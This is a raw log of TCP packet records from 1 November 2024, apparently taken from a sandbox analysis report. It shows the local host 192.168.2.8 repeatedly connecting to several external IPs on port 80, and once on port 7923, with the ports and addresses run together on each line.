                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.612587929 CET804980485.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.033761978 CET4980480192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.067962885 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.072798014 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.073270082 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.077306986 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.077476025 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.082151890 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.082308054 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.368484020 CET804980318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.370906115 CET4980380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.376039028 CET804980318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.376590967 CET4980380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.568332911 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573348045 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573431015 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.578478098 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.578495026 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943753958 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943802118 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943866014 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.987036943 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.991889954 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.991961956 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.992387056 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.992409945 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.997426033 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.997447968 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.400188923 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.400346041 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.405560017 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.405616045 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.523380995 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.528153896 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.528382063 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.533565998 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.533608913 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.538429022 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.538517952 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.203380108 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.203921080 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.210047007 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.213682890 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.324286938 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329170942 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329243898 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329370975 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329399109 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.334290981 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.334305048 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.442374945 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.442589998 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.447674990 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.447740078 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.670137882 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.674973011 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675100088 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675199986 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675215960 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.680072069 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.680089951 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.511961937 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.513721943 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.519185066 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.519244909 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.556068897 CET4981280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.561052084 CET804981247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.561115980 CET4981280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.561356068 CET4981280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.561374903 CET4981280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.566303968 CET804981247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.566318989 CET804981247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.748615980 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.761403084 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.766700029 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.769289970 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.038866997 CET4981280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.087290049 CET4981380192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.092168093 CET804981347.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.092983007 CET4981380192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.093075037 CET4981380192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.093094110 CET4981380192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.097871065 CET804981347.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.097888947 CET804981347.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.295123100 CET4981480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.300066948 CET804981413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.300292969 CET4981480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.302165031 CET4981480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.302191019 CET4981480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.307024002 CET804981413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.307060957 CET804981413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.737118959 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.742125988 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.007656097 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.009895086 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.014794111 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.561674118 CET804981347.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.561820984 CET4981380192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.566937923 CET804981347.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.566992998 CET4981380192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.616373062 CET4982580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.621251106 CET804982518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.621308088 CET4982580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.621440887 CET4982580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.621464014 CET4982580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.626334906 CET804982518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.626348972 CET804982518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.736144066 CET804981413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.736335039 CET4981480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.741595984 CET804981413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.741645098 CET4981480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.129255056 CET4982680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.134197950 CET804982634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.134280920 CET4982680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.134449959 CET4982680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.134476900 CET4982680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.139266968 CET804982634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.139278889 CET804982634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.283320904 CET804982518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.283699036 CET4982580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.288691998 CET804982518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.288743019 CET4982580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.352262020 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.357120991 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.357181072 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.357310057 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.357337952 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.362071037 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.362095118 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.968082905 CET804982634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.982623100 CET4982680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.987919092 CET804982634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.987973928 CET4982680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.380750895 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595118046 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595355988 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595418930 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595442057 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595690966 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595730066 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595746994 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.600414038 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.600538015 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.600662947 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.800206900 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.800427914 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.811739922 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.813633919 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.843184948 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.848062992 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849759102 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849875927 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849893093 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.854757071 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.854770899 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.818784952 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.822531939 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.828073978 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.830420017 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.861614943 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.866441965 CET804984518.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.866583109 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.866821051 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.866883039 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.871651888 CET804984518.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.872073889 CET804984518.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.279721975 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.280045986 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.281236887 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.282071114 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.285471916 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.286483049 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.437674999 CET4985180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.442501068 CET804985113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.442581892 CET4985180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.442747116 CET4985180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.443625927 CET4985180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.447676897 CET804985113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.448443890 CET804985113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.935671091 CET804984518.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.935823917 CET804985113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.935966015 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.936399937 CET4985180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.937845945 CET804984518.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.937896013 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.942918062 CET804984518.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.943578005 CET804985113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.943624020 CET4984580192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.943685055 CET4985180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.988342047 CET4985780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993592978 CET804985713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993650913 CET4985780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993966103 CET4985780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993978024 CET4985780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.998980045 CET804985713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.998991966 CET804985713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.132569075 CET4986080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137634993 CET804986034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137708902 CET4986080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137952089 CET4986080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137967110 CET4986080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.142971992 CET804986034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.143011093 CET804986034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.979274988 CET804986034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.979456902 CET4986080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.984699965 CET804986034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.986529112 CET4986080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.167135000 CET4986880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.172106981 CET80498683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.173177004 CET4986880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.173372030 CET4986880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.173398018 CET4986880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.178198099 CET80498683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.178239107 CET80498683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.435184002 CET804985713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.435439110 CET4985780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.440733910 CET804985713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.442744017 CET4985780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.490376949 CET4987080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495249033 CET804987018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495631933 CET4987080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495888948 CET4987080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495959997 CET4987080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.501214027 CET804987018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.501307964 CET804987018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.866695881 CET80498683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.867732048 CET4986880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.872865915 CET80498683.94.10.34192.168.2.8
